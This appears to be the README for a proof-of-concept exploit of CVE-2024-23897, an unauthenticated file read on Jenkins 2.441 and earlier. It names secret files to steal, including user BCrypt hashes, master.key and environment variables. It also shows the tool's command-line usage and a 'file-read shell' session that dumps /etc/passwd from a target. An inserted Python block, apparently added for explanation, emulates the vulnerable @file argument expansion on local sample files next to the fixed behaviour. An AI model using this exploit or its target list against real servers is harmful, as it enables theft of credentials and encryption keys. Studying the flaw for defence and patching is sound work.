This Proof-of-Concept (POC) exploits CVE-2024-23897 to achieve arbitrary file read on Jenkins 2.441 and earlier (LTS 2.426.2 and earlier).
Jenkins 2.441 and earlier, LTS 2.426.2 and earlier do not disable a feature of the CLI command parser that replaces an @
character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
Severity: 7.5 HIGH Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
There is a significant limitation to this vulnerability: binary files cannot be fully read, because the parser consumes the file as text and bytes that are not valid characters are mangled. Plaintext files that could be of interest:
/proc/self/environ: environment variables, including JENKINS_HOME
/proc/self/cmdline: command-line arguments
/etc/hosts: Linux local DNS resolution
/etc/passwd: Linux user accounts
/var/jenkins_home/users/users.xml: user account storage locations
/var/jenkins_home/users/<user_directory>/config.xml: user BCrypt password hash
/var/jenkins_home/secrets/master.key: encryption secret key
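The following is an added example, not part of this PoC or of Jenkins: a small Python emulation of the args4j "@file" argument expansion that CVE-2024-23897 abuses, next to the hardened behaviour of the fix (the feature switched off). The vulnerable path is modelled on args4j's expandAtFiles(), which replaces an argument of the form "@<path>" with the lines of <path>, one argument per line; the hardened path leaves the argument untouched, as Jenkins does since the fix. The file names and contents below are constructed sample data, and the demo function and its arguments are illustrative only.

```python
"""Added example: emulate args4j-style "@file" expansion (vulnerable) beside the
hardened behaviour (expansion disabled). Not the PoC's or Jenkins' own code.
"""
import tempfile
from pathlib import Path


def expand_at_files(args, at_syntax=True, encoding="utf-8"):
    """Return the argument list after (optional) @file expansion.

    at_syntax=True  -> vulnerable: an argument "@<path>" is replaced by the
                       lines of <path>, one argument per line (args4j behaviour
                       that Jenkins <= 2.441 left enabled).
    at_syntax=False -> hardened: the argument is kept literally, which is what
                       the Jenkins fix does by disabling the parser feature.

    Bytes are decoded with errors="replace" to mirror how a text reader mangles
    data that is not valid in the platform charset; this is why binary files
    cannot be read back intact through this bug.
    """
    if not at_syntax:
        return list(args)

    expanded = []
    for arg in args:
        if arg.startswith("@"):
            path = Path(arg[1:])
            if not path.exists():
                # args4j raises CmdLineException(NO_SUCH_FILE) at this point
                raise FileNotFoundError(f"No such file: {path}")
            text = path.read_bytes().decode(encoding, errors="replace")
            expanded.extend(text.splitlines())  # one argument per line
        else:
            expanded.append(arg)
    return expanded


def demo():
    """Run both parser modes over constructed sample files (assumed inputs).

    Returns (vulnerable_args, hardened_args, mangled_binary_args).
    """
    with tempfile.TemporaryDirectory() as tmp:
        # Constructed stand-in for a sensitive text file such as master.key.
        secret = Path(tmp) / "master.key"
        secret.write_text("deadbeef\nsecond line\n")
        # Constructed binary blob: invalid UTF-8 around one plaintext line.
        binary = Path(tmp) / "blob.bin"
        binary.write_bytes(b"\x00\xff\xfe\nPLAIN\n\x80\x81")

        # "connect-node" stands for any CLI command that accepts an argument.
        vulnerable = expand_at_files(["connect-node", f"@{secret}"])
        hardened = expand_at_files(["connect-node", f"@{secret}"], at_syntax=False)
        mangled = expand_at_files([f"@{binary}"])
        return vulnerable, hardened, mangled


if __name__ == "__main__":
    v, h, m = demo()
    print("vulnerable :", v)
    print("hardened   :", h)
    print("binary     :", m)
```

Running the block shows the file's lines arriving as separate arguments in the vulnerable mode, the literal "@/path" string in the hardened mode, and the binary sample surviving only where it happened to be valid text, which is the limitation noted above.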
usage: jenkins_fileread.py [-h] -u URL [-f FILE] [-t TIMEOUT] [-s] [-o] [-p PROXY] [-v]
POC for CVE-2024-23897 (Jenkins file read)
options:
-h, --help show this help message and exit
-u URL, --url URL Jenkins URL
-f FILE, --file FILE File path to read
-t TIMEOUT, --timeout TIMEOUT
Request timeout
-s, --save Save file contents
-o, --overwrite Overwrite existing files
-p PROXY, --proxy PROXY
HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)
-v, --verbose Verbosity enabled - additional output flag
$ jenkins_fileread.py -u http://<target-ip>:8080
Welcome to the Jenkins file-read shell. Type help or ? to list commands.
file> /etc/passwd
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
root:x:0:0:root:/root:/bin/bash
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
jenkins:x:1000:1000::/var/jenkins_home:/bin/bash
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync